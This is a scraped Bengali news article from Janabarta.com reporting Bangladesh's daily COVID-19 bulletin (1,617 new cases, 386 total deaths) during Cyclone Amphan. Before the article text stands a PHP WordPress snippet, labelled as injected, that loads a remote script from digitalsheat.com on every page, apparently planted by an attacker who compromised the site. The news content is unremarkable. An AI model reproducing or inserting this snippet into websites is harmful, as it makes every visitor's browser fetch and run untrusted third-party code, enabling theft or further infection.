// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site নতুন শনাক্ত ১৬১৭, মোট মৃত্যু ৩৮৬ - Janabarta.com

নতুন শনাক্ত ১৬১৭, মোট মৃত্যু ৩৮৬

স্বাস্থ্য অধিদপ্তরের অতিরিক্ত মহাপরিচালক অধ্যাপক ডা. নাসিমা সুলতানা

নিজস্ব প্রতিবেদক: ঘূর্ণিঝড় আম্পানের ডামাডোলের মধ্যেই করোনা ভাইরাস এগিয়ে চলছে তার আপন গতিতে। গত ২৪ ঘণ্টায় দেশে নতুন করে আরো ১ হাজার ৬১৭ জনের দেহে কোভিড-১৯ শনাক্ত করা হয়েছে। এ নিয়ে দেশে মোট করোনা রোগীর সংখ্যা বেড়ে দাঁড়ালো ২৬ হাজার ৭৩৮ জন। এছাড়া গত একদিনে নতুন করে আরো ১৬ জনের মৃত্যু হয়েছে। এ নিয়ে দেশে মোট মৃত্যুর সংখ্যা বেড়ে দাঁড়ালো ৩৮৬ জনে।

আজ বুধবার স্বাস্থ্য অধিদপ্তরের করোনা সংক্রান্ত নিয়মিত বুলেটিনে এসব তথ্য জানানো হয়। বুলেটিনে এসব তথ্য জানান স্বাস্থ্য অধিদপ্তরের অতিরিক্ত মহাপরিচালক অধ্যাপক ডা. নাসিমা সুলতানা।

তিনি বলেন, গত ২৪ ঘণ্টায় ১০ হাজার ২০৭ জনের নমুনা পরীক্ষা করা হয়েছে। এর মধ্যে ১ হাজার ৬১৭ জনকে কোভিড-১৯ পজেটিভ হিসেবে শনাক্ত করা হয়েছে। এ নিয়ে শনাক্ত রোগীর সংখ্যা বেড়ে দাঁড়ালো ২৬ হাজার ৭৩৮ জন।

নাসিমা সুলতানা বলেন, গত ২৪ ঘণ্টায় ভাইরাসটিতে সংক্রমিত হয়ে আরো ১৬ জনের মৃত্যু হয়েছে। এ নিয়ে মৃত্যুর সংখ্যা বেড়ে দাঁড়ালো ৩৮৬ জন। এছাড়া গত ২৪ ঘণ্টায় ২১৪ জন করোনা রোগী সুস্থ হয়েছেন। এ নিয়ে মোট ৫ হাজার ২০৭ জন রোগী সুস্থ হলেন।

গত ৮ মার্চ দেশে প্রথম করোনা রোগী শনাক্ত হয়। প্রথম করোনা আক্রান্ত ব্যক্তির মৃত্যু ঘটে ১৮ মার্চ।